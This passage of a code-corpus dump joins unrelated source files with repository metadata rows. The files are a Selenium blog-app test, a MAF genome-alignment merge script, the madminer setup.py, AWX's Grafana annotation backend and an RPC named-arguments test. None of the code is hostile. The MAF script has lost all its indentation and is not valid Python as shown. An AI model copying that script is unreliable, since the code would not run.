    # successful registration
    registration_xp = '//li[@class="nav-item"]/a[@href="#/register"]'
    reg_input_fields_xp = '//input'
    sign_up_btn_xp = '//button[contains(text(),"Sign up")]'
    notice_btn_xp = '//div[@class="swal-button-container"]/button'
    new_article_xp = '//a[@href="#/editor"]'
    # Randomized username avoids "already registered" collisions on reruns.
    random_user = f"Hose{randint(1, 100)}"
    reg_input_data = [random_user, f"{random_user}@gmail.com", "12ABab@&"]
    locator(registration_xp).click()
    locators(reg_input_fields_xp)
    # registration and save login data in file
    login_data = []
    for _ in range(len(reg_input_data)):
        locators(reg_input_fields_xp)[_].send_keys(reg_input_data[_])
    # Only email + password (fields 1..2) are needed to log back in later.
    for _ in locators(reg_input_fields_xp)[1:]:
        login_data.append(_.get_attribute("value"))
    with open("login_data.txt", "w") as login_file:  # write data_list in file
        for item in login_data:
            login_file.write("%s\n" % item)
    locator(sign_up_btn_xp).click()
    time.sleep(2)
    locator(notice_btn_xp).click()
    # create new blog_post
    expect_elements_placeholder = ["Article Title", "What's this article about?", "Write your article (in markdown)",
                                   "Enter tags"]
    random_blog_n = randint(1, 100)
    blog_test_data = [f'Summer{random_blog_n}', f'Sun{random_blog_n}',
                      "There are many variations of passages of Lorem Ipsum available, but the majority have suffered "
                      "alteration in some form, by injected humour, or randomised words which don't look even slightly "
                      "believable.", "quality"]
    blog_title_xp = '//div[@class="container"]/h1'
    blog_paragraph_xp = '//div[@class="row article-content"]//p'
    with open('blog_data.txt', "w") as blog_file:  # write data_list in file
        for _ in blog_test_data:
            blog_file.write("%s\n" % _)
    locator(new_article_xp).click()
    form_input_fields = locators(form_input_fields_xp)
    form_input_fields.insert(2, locator(textarea_xp))  # make full form fields
    # check placeholders
    compare_two_lists(form_input_fields, expect_elements_placeholder, "placeholder")
    # fill in form input fields
    fill_input_fields_and_send(blog_test_data, form_input_fields, locator(publish_btn_xp))
    # check url, blog
    time.sleep(2)
    expected_blog = blog_test_data[0]
    # The app slugs the article URL from the lower-cased title.
    expected_url = f'http://localhost:1667/#/articles/{expected_blog.lower()}'
    assert driver.current_url == expected_url
    assert locator(blog_title_xp).text == blog_test_data[0]
    assert locator(blog_paragraph_xp).text == blog_test_data[2]
    # check the blog post is included in the global feed list (all pages)
    locator(home_link_xp).click()
    locators(global_feed_list_xp)
    # create_text_list(from global_feed_list to global_posts)
    global_posts = []
    all_pages_link = locators(all_pages_link_xp)
    for page in all_pages_link:
        # Collect the titles on the current page, then paginate onward.
        global_feed_list = locators(global_feed_list_xp)
        create_text_list(global_feed_list, global_posts)
        page.click()
    assert blog_test_data[0] in global_posts
    locator(logout_xp).click()
    time.sleep(3)
# A012_CON_TC13_Meglévő blogbejegyzésem szerkesztése
def test_mod_and_del_blog():
    """A012_CON_TC13/TC14: log in with the credentials saved by
    test_new_blog, edit the previously created blog post, then delete it
    and verify it disappears from both the Global Feed and Your Feed."""
    url = "http://localhost:1667"
    driver.get(url)
    time.sleep(2)
    # login
    login_xp = '//*[@id="app"]/nav/div/ul/li[@class="nav-item"]/a[@href="#/login"]'
    log_input_fields_xp = '//input'
    sign_in_btn_xp = '//button[contains(text(),"Sign in")]'
    locator(login_xp).click()
    # Collect previous login_data (written by test_new_blog)
    login_data = []
    with open("login_data.txt", "r") as log_file:
        content = log_file.readlines()
        for i in content:
            login_data.append(i.replace("\n", ""))
    # login
    log_input_fields = locators(log_input_fields_xp)
    fill_input_fields_and_send(login_data, log_input_fields, locator(sign_in_btn_xp))
    time.sleep(3)
    # modified blog
    my_articles_title_xp = '//div[@class="article-preview"]//a//h1'
    nav_bar_user_xp = '//*[@id="app"]/nav/div/ul/li[4]/a'
    blog_data = []
    with open("blog_data.txt", "r") as blog_file:  # Collect previous blog_data
        content = blog_file.readlines()
        for _ in content:
            blog_data.append(_.replace("\n", ""))
    # Open the logged-in user's profile via the nav-bar username link.
    user_name = locator(nav_bar_user_xp)
    user_id_nav_xp = f'//nav//li/a[contains(text(), "{user_name.text}")]'
    locator(user_id_nav_xp).click()
    time.sleep(5)
    # find_my_blog_title
    my_blog_title = locator(f'{my_articles_title_xp}[contains(text(), "{blog_data[0]}")]')
    my_blog_title.click()
    # edit blog
    article_page_h1_xp = '//div[@class="container"]/h1'
    edit_btn_xp = '//div//span//a//span[contains(text(), "Edit Article")]'
    mod_test_data = ["test modify", " Sun", "Sunny. Yesterday my life was fill the rain.", "sun"]
    locator(edit_btn_xp).click()
    form_input_fields = locators(form_input_fields_xp)
    form_input_fields.insert(2, locator(textarea_xp))  # make full form fields
    for _ in range(len(mod_test_data)):
        form_input_fields[_].clear()
        # The tags field keeps old tags as chips; remove them explicitly.
        if form_input_fields[_].get_attribute("placeholder") == "Enter tags":
            locator('//div//i[@class="ti-icon-close"]').click()
        form_input_fields[_].send_keys(mod_test_data[_])
    locator(publish_btn_xp).click()
    # check blog
    assert locator(article_page_h1_xp).text == mod_test_data[0]
    # A012_CON_TC14: delete my existing blog post
    time.sleep(3)
    delete_btn_xp = '//div/span/button[@class="btn btn-outline-danger btn-sm"]'
    your_feed_xp = '//div[@class="feed-toggle"]/ul/li[1]/a[contains(text(), "Your Feed")]'
    your_feed_list_xp = '//div[@class="home-my-feed"]//a[@class="preview-link"]/h1'
    locator(delete_btn_xp).click()
    # check delete blog in global feeds
    time.sleep(3)
    locator(home_link_xp).click()
    locators(global_feed_list_xp)
    # create_text_list(from global_feed_list to global_posts)
    global_posts = []
    all_pages_link = locators(all_pages_link_xp)
    for page in all_pages_link:
        global_feed_list = locators(global_feed_list_xp)
        create_text_list(global_feed_list, global_posts)
        page.click()
        # NOTE(review): sleep placement reconstructed — original indentation
        # was lost; waiting after each pagination click before re-querying.
        time.sleep(5)
    assert not mod_test_data[0] in global_posts
    # check delete blog in your feeds
    locator(your_feed_xp).click()
    your_posts = []
    all_pages_link = locators(all_pages_link_xp)
    for _ in all_pages_link:
        your_feed_list = locators(your_feed_list_xp)
        create_text_list(your_feed_list, your_posts)
        _.click()
        time.sleep(5)
    assert not mod_test_data[0] in your_posts
    locator(logout_xp).click()
355497f855a5610e465ee945f6f0c2e91bfa5610 | 6,198 | py | Python | maf_merge_from_consensus.py | brendane/miscellaneous_bioinfo_scripts | 91ca3282823495299e4c68aa79bdc1c0225a6d7b | [
"MIT"
] | null | null | null | maf_merge_from_consensus.py | brendane/miscellaneous_bioinfo_scripts | 91ca3282823495299e4c68aa79bdc1c0225a6d7b | [
"MIT"
] | 1 | 2020-09-17T11:14:13.000Z | 2020-09-17T11:14:13.000Z | maf_merge_from_consensus.py | brendane/miscellaneous_bioinfo_scripts | 91ca3282823495299e4c68aa79bdc1c0225a6d7b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Merge multi-stage whole genome alignments
maf_merge_from_consensus.py --output <output file> <input maf>
<input_name:input_file...>
"""
import argparse
import collections
from Bio import Seq
MafSeq = collections.namedtuple('MafSeq', 'seq_name start aligned_bases strand contig_length seq')
def parse_maf(ih, print_line=False, handle=None):
record = {'a':{}, 's':{}}
for line in ih:
if print_line:
handle.write(line)
if line.startswith('a'):
if len(record['s']) > 0:
yield record
record = {'a':{}, 's':{}}
record['a'] = {x.split('=')[0]:x.split('=')[1] for x in line.strip().split()[1:]}
record['s'] = []
elif line.startswith('s'):
fields = line.strip().split()[1:]
record['s'].append(MafSeq(fields[0], int(fields[1]), int(fields[2]), fields[3], int(fields[4]), fields[5]))
else:
continue
yield record
parser = argparse.ArgumentParser(usage=__doc__)
parser.add_argument('--output')
parser.add_argument('maf')
parser.add_argument('inputs', nargs='+')
args = parser.parse_args()
## Goal:
## MAF file with coordinates of individual genomes
## 1. Map between consensus coordinates and individual genome coordinates
## args.inputs = batch_0:results/.../round1-batch.0/processed.maf
## Do this for each seq_name separately to parallelize
full_coords = {}
contig_lengths = {}
individual_contigs = collections.defaultdict(list)
for seq_name, maf_file in map(lambda x: x.split(':'), args.inputs):
coords = {} # consensus position: genome_position, direction, base
with open(maf_file, 'rt') as handle:
for rec in parse_maf(handle):
label = rec['a']['label']
length = len(rec['s'][0].seq)
print(seq_name, label)
for i in range(length):
# i = consensus position
coords[(seq_name + '.' + label, i)] = {}
for srec in rec['s']:
direction = 1
j = srec.start
if srec.strand == '-':
direction = -1
j = srec.contig_length - srec.start - 1
for i in range(length):
if i == 0:
contig_lengths[srec.seq_name] = srec.contig_length
individual_contigs[seq_name + '.' + label].append(srec.seq_name)
if srec.seq[i] == '-':
coords[(seq_name + '.' + label, i)][srec.seq_name] = (None, direction, srec.seq[i])
else:
coords[(seq_name + '.' + label, i)][srec.seq_name] = (j, direction, srec.seq[i])
j += direction
full_coords[seq_name] = coords
## 2. Walk through alignment of consensuses, substituting in the
## coordinates and bases from the individual genomes
## Do this for ind_seq_name separately to parallelize
with open(args.output, 'wt') as oh:
with open(args.maf, 'rt') as handle:
## For each LCB in the alignment of consensus genome
for rec in parse_maf(handle):
label = rec['a']['label']
length = len(rec['s'][0].seq)
oh.write('a label=' + label + '\n')
## For each consensus sequence that contributes to this LCB
for srec in rec['s']:
lcb = srec.seq_name
consensus = srec.seq_name.split('.')[0]
coords = full_coords[consensus]
## For each individual sequence that is part of the consensus sequence
for ind_seq_name in individual_contigs[lcb]:
direction = 1
j = srec.start
if srec.strand == '-':
direction = -1
j = srec.contig_length - srec.start - 1
ind_start = None
ind_end = None
ind_strand = None # Multiplied by direction of LCB in consensus alignment
ind_contig_length = contig_lengths[ind_seq_name]
aln_length = 0
sequence = ''
## Loop through each base to figure out start, end,
## strand, and aligned sequence
for i in range(length):
if srec.seq[i] == '-':
sequence += '-'
else:
## Matching coordinates:
matching = coords[(lcb, j)][ind_seq_name]
pos = matching[0]
ind_strand = matching[1]
bp = matching[2]
if direction == -1: bp = Seq.reverse_complement(bp)
sequence += bp
if bp != '-': aln_length += 1
j += direction
if pos is not None and (ind_start is None or ind_start > pos):
ind_start = pos
if pos is not None and (ind_end is None or ind_end < pos):
ind_end = pos
## Print out the record
actual_direction = ind_strand * direction
if len(set(sequence) - set('-')) == 0:
## Covers entirely a gap region in the non-consensus alignment
continue
if actual_direction == 1:
oh.write('s\t' + ind_seq_name + '\t' + str(ind_start) + '\t' +
str(aln_length) + '\t+\t' + str(ind_contig_length) +
'\t' + sequence + '\n')
else:
oh.write('s\t' + ind_seq_name + '\t' + str(ind_contig_length - ind_end) + '\t' +
str(aln_length) + '\t-\t' + str(ind_contig_length) +
'\t' + sequence + '\n')
oh.write('\n')
## 3. Merge all the individual components together if parallelized
| 42.452055 | 119 | 0.495482 |
b90b1f49a610781c4aad85f09b0d68671b8b54c5 | 3,825 | py | Python | setup.py | vischia/madminer | 98c2bcfb93d0fd84ff1872b344c4d89adf51217f | [
"MIT"
] | null | null | null | setup.py | vischia/madminer | 98c2bcfb93d0fd84ff1872b344c4d89adf51217f | [
"MIT"
] | null | null | null | setup.py | vischia/madminer | 98c2bcfb93d0fd84ff1872b344c4d89adf51217f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://github.com/kennethreitz/setup.py
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'madminer'
DESCRIPTION = 'Mining gold from MadGraph to improve limit setting in particle physics.'
URL = 'https://github.com/johannbrehmer/madminer'
EMAIL = 'johann.brehmer@nyu.edu'
AUTHOR = 'Johann Brehmer, Felix Kling, Kyle Cranmer'
REQUIRES_PYTHON = '>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4'
# Set VERSION to a false-y value to load it from <NAME>/__version__.py instead.
VERSION = '0.1.1'
# What packages are required for this module to be executed?
REQUIRED = [
    "six",
    "numpy>=1.11.0",
    "scipy>=1.0.0",
    "h5py",
    "scikit-hep",
    "scikit-learn>=0.19.0",
    "torch>=0.4.0",
    "bqplot",
    "uproot",
    "matplotlib",
]
# What packages are optional?
EXTRAS = {
    # 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
# Directory containing this setup.py; used to resolve README and version paths.
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
# NOTE(review): FileNotFoundError only exists on Python 3; on Python 2 (which
# REQUIRES_PYTHON allows) a missing README raises IOError and this except
# clause itself raises NameError — confirm whether Python 2 is really supported.
try:
    with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
        long_description = '\n' + f.read()
except FileNotFoundError:
    long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
    # Fallback: execute <NAME>/__version__.py and read __version__ from it.
    with open(os.path.join(here, NAME, '__version__.py')) as f:
        exec(f.read(), about)
else:
    about['__version__'] = VERSION
class UploadCommand(Command):
    """Custom ``setup.py upload`` command.

    Rebuilds the sdist/wheel from scratch, uploads them to PyPI via twine,
    and pushes a matching git version tag.
    """
    description = 'Build and publish the package.'
    user_options = []
    @staticmethod
    def status(s):
        """Prints things in bold."""
        print('\033[1m{0}\033[0m'.format(s))
    def initialize_options(self):
        # This command takes no options.
        pass
    def finalize_options(self):
        # Nothing to validate.
        pass
    def run(self):
        # Start from a clean slate; a missing dist/ directory is fine.
        try:
            self.status('Removing previous builds…')
            rmtree(os.path.join(here, 'dist'))
        except OSError:
            pass
        # Build and upload, announcing each step in bold.
        steps = (
            ('Building Source and Wheel (universal) distribution…',
             '{0} setup.py sdist bdist_wheel --universal'.format(sys.executable)),
            ('Uploading the package to PyPI via Twine…',
             'twine upload dist/*'),
        )
        for message, command in steps:
            self.status(message)
            os.system(command)
        # Tag the release and publish the tag.
        self.status('Pushing git tags…')
        os.system('git tag v{0}'.format(about['__version__']))
        os.system('git push --tags')
        sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
# If your package is a single module, use this instead of 'packages':
# py_modules=['mypackage'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
) | 27.517986 | 87 | 0.635033 |
0d7dff9e05a11b257e2d2d4b98a9b4030e9c24c4 | 5,246 | py | Python | awx/main/notifications/grafana_backend.py | ziegenberg/awx | a3e29317c5d4220fffe28370ec73c73802255246 | [
"Apache-2.0"
] | null | null | null | awx/main/notifications/grafana_backend.py | ziegenberg/awx | a3e29317c5d4220fffe28370ec73c73802255246 | [
"Apache-2.0"
] | 2 | 2022-02-10T11:57:21.000Z | 2022-02-27T22:43:44.000Z | awx/main/notifications/grafana_backend.py | ziegenberg/awx | a3e29317c5d4220fffe28370ec73c73802255246 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 Ansible, Inc.
# All Rights Reserved.
import datetime
import json
import logging
import requests
import dateutil.parser as dp
from django.utils.encoding import smart_str
from django.utils.translation import gettext_lazy as _
from awx.main.notifications.base import AWXBaseEmailBackend
from awx.main.notifications.custom_notification_base import CustomNotificationBase
# Message/body templates shared by all notification backends; re-exported at
# module level so the class body below can reference them without the prefix.
DEFAULT_MSG = CustomNotificationBase.DEFAULT_MSG
DEFAULT_APPROVAL_RUNNING_MSG = CustomNotificationBase.DEFAULT_APPROVAL_RUNNING_MSG
DEFAULT_APPROVAL_RUNNING_BODY = CustomNotificationBase.DEFAULT_APPROVAL_RUNNING_BODY
DEFAULT_APPROVAL_APPROVED_MSG = CustomNotificationBase.DEFAULT_APPROVAL_APPROVED_MSG
DEFAULT_APPROVAL_APPROVED_BODY = CustomNotificationBase.DEFAULT_APPROVAL_APPROVED_BODY
DEFAULT_APPROVAL_TIMEOUT_MSG = CustomNotificationBase.DEFAULT_APPROVAL_TIMEOUT_MSG
DEFAULT_APPROVAL_TIMEOUT_BODY = CustomNotificationBase.DEFAULT_APPROVAL_TIMEOUT_BODY
DEFAULT_APPROVAL_DENIED_MSG = CustomNotificationBase.DEFAULT_APPROVAL_DENIED_MSG
DEFAULT_APPROVAL_DENIED_BODY = CustomNotificationBase.DEFAULT_APPROVAL_DENIED_BODY
# Module-level logger for this backend.
logger = logging.getLogger('awx.main.notifications.grafana_backend')
class GrafanaBackend(AWXBaseEmailBackend, CustomNotificationBase):
    """Notification backend that records AWX events as Grafana annotations.

    Each message becomes one ``POST <grafana_url>/api/annotations`` request,
    authenticated with a Grafana API key (Bearer token).
    """
    # Fields surfaced when configuring this notification type.
    init_parameters = {"grafana_url": {"label": "Grafana URL", "type": "string"}, "grafana_key": {"label": "Grafana API Key", "type": "password"}}
    # The "recipient" of a message is the Grafana base URL to post to.
    recipient_parameter = "grafana_url"
    sender_parameter = None
    # Default annotation body: the rendered job metadata template.
    DEFAULT_BODY = "{{ job_metadata }}"
    default_messages = {
        "started": {"body": DEFAULT_BODY, "message": DEFAULT_MSG},
        "success": {"body": DEFAULT_BODY, "message": DEFAULT_MSG},
        "error": {"body": DEFAULT_BODY, "message": DEFAULT_MSG},
        "workflow_approval": {
            "running": {"message": DEFAULT_APPROVAL_RUNNING_MSG, "body": DEFAULT_APPROVAL_RUNNING_BODY},
            "approved": {"message": DEFAULT_APPROVAL_APPROVED_MSG, "body": DEFAULT_APPROVAL_APPROVED_BODY},
            "timed_out": {"message": DEFAULT_APPROVAL_TIMEOUT_MSG, "body": DEFAULT_APPROVAL_TIMEOUT_BODY},
            "denied": {"message": DEFAULT_APPROVAL_DENIED_MSG, "body": DEFAULT_APPROVAL_DENIED_BODY},
        },
    }
    def __init__(
        self, grafana_key, dashboardId=None, panelId=None, annotation_tags=None, grafana_no_verify_ssl=False, isRegion=True, fail_silently=False, **kwargs
    ):
        """Store Grafana connection and annotation settings.

        Args:
            grafana_key: API key, sent as ``Authorization: Bearer <key>``.
            dashboardId: optional numeric dashboard id added to the payload.
            panelId: optional numeric panel id added to the payload.
            annotation_tags: optional list of tags attached to each annotation.
            grafana_no_verify_ssl: when True, skip TLS certificate verification.
            isRegion: passed through as the annotation's ``isRegion`` flag.
            fail_silently: when True, log errors instead of raising.
        """
        super(GrafanaBackend, self).__init__(fail_silently=fail_silently)
        self.grafana_key = grafana_key
        # int() here also validates that the ids are numeric.
        self.dashboardId = int(dashboardId) if dashboardId is not None else None
        self.panelId = int(panelId) if panelId is not None else None
        self.annotation_tags = annotation_tags if annotation_tags is not None else []
        self.grafana_no_verify_ssl = grafana_no_verify_ssl
        self.isRegion = isRegion
    def format_body(self, body):
        """Decode *body* (JSON text) into a dict when possible.

        Returns the decoded object if it is a dict, or ``{}`` if *body* is
        not valid JSON. NOTE(review): valid JSON that is not an object (a
        list, number, ...) leaves *body* unchanged rather than returning
        ``{}`` — confirm this asymmetry is intended.
        """
        # expect body to be a string representing a dict
        try:
            potential_body = json.loads(body)
            if isinstance(potential_body, dict):
                body = potential_body
        except json.JSONDecodeError:
            body = {}
        return body
    def send_messages(self, messages):
        """Post one Grafana annotation per message; return the count sent.

        Raises (unless ``fail_silently``) when a timestamp cannot be parsed
        or when Grafana answers with an HTTP status >= 400.
        """
        sent_messages = 0
        for m in messages:
            grafana_data = {}
            grafana_headers = {}
            # Membership test works for dict bodies (key lookup) and for
            # plain string bodies (substring match) alike.
            if 'started' in m.body:
                try:
                    # Grafana expects epoch milliseconds: parse with dateutil,
                    # drop tzinfo, and measure from the Unix epoch.
                    epoch = datetime.datetime.utcfromtimestamp(0)
                    grafana_data['time'] = grafana_data['timeEnd'] = int((dp.parse(m.body['started']).replace(tzinfo=None) - epoch).total_seconds() * 1000)
                    if m.body.get('finished'):
                        grafana_data['timeEnd'] = int((dp.parse(m.body['finished']).replace(tzinfo=None) - epoch).total_seconds() * 1000)
                except ValueError:
                    # NOTE(review): this error path indexes m.body['finished']
                    # directly; if that key is absent the logging call itself
                    # raises KeyError — confirm.
                    logger.error(smart_str(_("Error converting time {} or timeEnd {} to int.").format(m.body['started'], m.body['finished'])))
                    if not self.fail_silently:
                        raise Exception(smart_str(_("Error converting time {} and/or timeEnd {} to int.").format(m.body['started'], m.body['finished'])))
            # Optional annotation targeting/metadata.
            grafana_data['isRegion'] = self.isRegion
            if self.dashboardId is not None:
                grafana_data['dashboardId'] = self.dashboardId
            if self.panelId is not None:
                grafana_data['panelId'] = self.panelId
            if self.annotation_tags:
                grafana_data['tags'] = self.annotation_tags
            grafana_data['text'] = m.subject
            grafana_headers['Authorization'] = "Bearer {}".format(self.grafana_key)
            grafana_headers['Content-Type'] = "application/json"
            # The first (and only) recipient is the Grafana base URL.
            r = requests.post(
                "{}/api/annotations".format(m.recipients()[0]), json=grafana_data, headers=grafana_headers, verify=(not self.grafana_no_verify_ssl)
            )
            if r.status_code >= 400:
                logger.error(smart_str(_("Error sending notification grafana: {}").format(r.status_code)))
                if not self.fail_silently:
                    raise Exception(smart_str(_("Error sending notification grafana: {}").format(r.status_code)))
            sent_messages += 1
        return sent_messages
| 49.028037 | 155 | 0.682234 |
894dd87fd23352ae4249a35a3c4032479c290306 | 1,292 | py | Python | test/functional/rpcnamedargs.py | Exgibichi/statusquo | 0a31913747fa09637cdaeadf009df75381e6efc4 | [
"MIT"
] | null | null | null | test/functional/rpcnamedargs.py | Exgibichi/statusquo | 0a31913747fa09637cdaeadf009df75381e6efc4 | [
"MIT"
] | null | null | null | test/functional/rpcnamedargs.py | Exgibichi/statusquo | 0a31913747fa09637cdaeadf009df75381e6efc4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test using named arguments for RPCs."""
from test_framework.test_framework import StatusquoTestFramework
from test_framework.util import (
assert_equal,
assert_raises_jsonrpc,
)
class NamedArgumentTest(StatusquoTestFramework):
    """
    Test named arguments on RPC calls.

    Exercises the JSON-RPC server's keyword-parameter support: unknown
    names are rejected, and omitted or None-valued arguments fall back
    to their defaults.
    """
    def __init__(self):
        super().__init__()
        # Reuse the cached chain and run a single node.
        self.setup_clean_chain = False
        self.num_nodes = 1
    def run_test(self):
        node = self.nodes[0]
        # help() accepts its argument by name and returns the matching text.
        h = node.help(command='getinfo')
        assert(h.startswith('getinfo\n'))
        # A named parameter the RPC does not declare is rejected with -8.
        assert_raises_jsonrpc(-8, 'Unknown named parameter', node.help, random='getinfo')
        # Named arguments work across chained calls as well.
        h = node.getblockhash(height=0)
        node.getblock(blockhash=h)
        # echo() mirrors its arguments back: gaps between provided named
        # positions are padded with None, and an explicit None looks the
        # same as an omitted argument in the result.
        assert_equal(node.echo(), [])
        assert_equal(node.echo(arg0=0,arg9=9), [0] + [None]*8 + [9])
        assert_equal(node.echo(arg1=1), [None, 1])
        assert_equal(node.echo(arg9=None), [None]*10)
        assert_equal(node.echo(arg0=0,arg3=3,arg9=9), [0] + [None]*2 + [3] + [None]*5 + [9])
# Script entry point: construct the test and hand control to the
# framework's main() driver.
if __name__ == '__main__':
    NamedArgumentTest().main()
| 30.761905 | 92 | 0.657121 |
2c393e83c6867ab3f6e38512c9d56c3a33b1f643 | 949 | py | Python | test/test_topology_lib_subinterface.py | payalupadhyaya/topology_lib_subinterface | 80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec | [
"Apache-2.0"
] | null | null | null | test/test_topology_lib_subinterface.py | payalupadhyaya/topology_lib_subinterface | 80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec | [
"Apache-2.0"
] | null | null | null | test/test_topology_lib_subinterface.py | payalupadhyaya/topology_lib_subinterface | 80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Test suite for module topology_lib_subinterface.
"""
from __future__ import unicode_literals, absolute_import
from __future__ import print_function, division
# Add your test cases here.
def test_your_test_case():
    """
    Document your test case here.
    """
    # Fix: the original print call was missing the closing quote on its
    # string literal, which made this module fail to import (SyntaxError).
    print("test this test case")
| 27.911765 | 66 | 0.741834 |
cbf1e8dee92d101a9bcf56d360c0b18ae3a79a52 | 1,775 | py | Python | dataset/utils.py | wolfib/proxy-nca | 7166025081b98dfafa02ba5dc1288ce981b9367e | [
"MIT"
] | null | null | null | dataset/utils.py | wolfib/proxy-nca | 7166025081b98dfafa02ba5dc1288ce981b9367e | [
"MIT"
] | null | null | null | dataset/utils.py | wolfib/proxy-nca | 7166025081b98dfafa02ba5dc1288ce981b9367e | [
"MIT"
] | null | null | null | from torchvision import transforms
import PIL.Image
import torch
def std_per_channel(images):
    """Per-channel standard deviation over a list of (3, H, W) image tensors.

    Args:
        images: list of 3-channel image tensors sharing the same H and W.

    Returns:
        Shape-(3,) tensor with the (unbiased) std of each channel, pooled
        over every pixel of every image.
    """
    stacked = torch.stack(images, dim=0)  # (N, 3, H, W)
    # Bug fix: the previous ``stacked.view(3, -1)`` just cut the flat buffer
    # into thirds, mixing pixels from different channels (and images)
    # whenever more than one image was passed. Grouping by channel requires
    # moving the channel axis to the front first.
    per_channel = stacked.transpose(0, 1).reshape(3, -1)  # (3, N*H*W)
    return per_channel.std(dim=1)
def mean_per_channel(images):
    """Per-channel mean over a list of (3, H, W) image tensors.

    Args:
        images: list of 3-channel image tensors sharing the same H and W.

    Returns:
        Shape-(3,) tensor with the mean of each channel, pooled over every
        pixel of every image.
    """
    stacked = torch.stack(images, dim=0)  # (N, 3, H, W)
    # Bug fix: the previous ``stacked.view(3, -1)`` just cut the flat buffer
    # into thirds, mixing pixels from different channels (and images)
    # whenever more than one image was passed. Grouping by channel requires
    # moving the channel axis to the front first.
    per_channel = stacked.transpose(0, 1).reshape(3, -1)  # (3, N*H*W)
    return per_channel.mean(dim=1)
class Identity():
    """No-op transform that returns its input unchanged.

    Used as a placeholder to skip an optional step in a transform pipeline.
    """
    def __call__(self, im):
        return im
class ScaleIntensities():
    """Linearly map tensor values from one range onto another.

    For example ``in_range=[-1, 1], out_range=[0, 255]`` rescales data in
    [-1, 1] to [0, 255].
    """
    def __init__(self, in_range, out_range):
        self.in_range = in_range
        self.out_range = out_range
    def __call__(self, tensor):
        in_lo, in_hi = self.in_range
        out_lo, out_hi = self.out_range
        # Normalize relative to the input range, then stretch and shift
        # onto the output range.
        fraction = (tensor - in_lo) / (in_hi - in_lo)
        return fraction * (out_hi - out_lo) + out_lo
def make_transform(sz_resize = 256, sz_crop = 227, mean = [128, 117, 104],
        std = [1, 1, 1], rgb_to_bgr = True, is_train = True,
        intensity_scale = [[0, 1], [0, 255]]):
    """Build the torchvision preprocessing pipeline for train or eval images.

    Args:
        sz_resize: shorter-side size used by Resize in eval mode.
        sz_crop: output crop size (random resized crop for train,
            center crop for eval).
        mean, std: per-channel normalization applied after intensity scaling.
        rgb_to_bgr: when True, reorder the channel axis RGB -> BGR at the end.
        is_train: selects the augmenting (train) or deterministic (eval) head.
        intensity_scale: (in_range, out_range) pair for ScaleIntensities,
            or None to skip rescaling.

    NOTE(review): the list defaults (mean/std/intensity_scale) are mutable
    default arguments; they are never mutated here, but tuples would be
    safer. The default mean is on a 0-255 scale, which matches the default
    intensity_scale of [0, 1] -> [0, 255].
    """
    return transforms.Compose([
        transforms.Compose([ # train: horizontal flip and random resized crop
            transforms.RandomResizedCrop(sz_crop),
            transforms.RandomHorizontalFlip(),
        ]) if is_train else transforms.Compose([ # test: else center crop
            transforms.Resize(sz_resize),
            transforms.CenterCrop(sz_crop),
        ]),
        # PIL image -> float tensor in [0, 1].
        transforms.ToTensor(),
        ScaleIntensities(
            *intensity_scale) if intensity_scale is not None else Identity(),
        transforms.Normalize(
            mean=mean,
            std=std,
        ),
        # Reorder the channel axis (dim 0) from RGB to BGR.
        transforms.Lambda(
            lambda x: x[[2, 1, 0], ...]
        ) if rgb_to_bgr else Identity()
    ])
| 29.098361 | 77 | 0.588732 |
e9f6b6c744f2841c65955a490697e99665544cb6 | 33 | py | Python | venus/db/dbo/adapter/__init__.py | nagylzs/python-venus-lib | 336d20532c32e874ab0a43cf866092b9e55dded5 | [
"Apache-2.0"
] | null | null | null | venus/db/dbo/adapter/__init__.py | nagylzs/python-venus-lib | 336d20532c32e874ab0a43cf866092b9e55dded5 | [
"Apache-2.0"
] | 1 | 2019-02-15T13:40:49.000Z | 2019-02-15T13:40:49.000Z | venus/db/dbo/adapter/__init__.py | nagylzs/python-venus-lib | 336d20532c32e874ab0a43cf866092b9e55dded5 | [
"Apache-2.0"
] | null | null | null | """Database adapters package."""
| 16.5 | 32 | 0.69697 |
38b6fc9243373b4563b87ae2eb886f68c67f81b3 | 274 | py | Python | problems/remove_element/solution.py | nagahshi/LeetCodeProblems_Repository | ed9831141fdd6ca432acb25318ef5afdb3a7fd3a | [
"MIT"
